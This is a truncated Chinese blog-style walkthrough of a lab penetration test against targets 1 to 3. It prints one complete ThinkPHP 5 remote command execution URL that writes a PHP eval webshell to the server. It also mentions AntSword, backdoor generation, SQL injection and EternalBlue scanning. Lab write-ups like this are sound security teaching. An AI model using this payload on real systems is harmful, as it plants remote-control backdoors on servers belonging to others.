本文详述了一次内网渗透的过程,从扫描Target1并利用ThinkPHPv5的命令执行漏洞,上传并执行webshell,到通过kali的蚁剑连接靶机,进一步探测系统信息和生成后门文件。接着,通过代理设置访问靶机2,进行Nmap扫描和Firefox代理访问,找出更多漏洞。最后,通过对后台源码分析,发现SQL注入漏洞,成功获取数据库信息,登录后台并在Target3上进行永恒之蓝扫描。
- 第一步:扫描Target1
- 第二步:既然存在http服务,那就用浏览器打开访问看看是个什么
- 第三步:根据 ThinkPHPv5 然后进行百度 然后得知存在命令执行漏洞然后进行漏洞测试
通过这句话进行远程命令执行上传webshell脚本:"http://192.168.1.11/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php @eval($_POST['c']);?>%27%20>%20shell.php"
- 第四步:使用kali里面的蚁剑连接上传的webshell脚本 连接上打开命令终端使用uname -a 查看系统版本
- 第五步:查看自己的IP地址,并根据自己的IP地址及目标靶机的系统类型
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
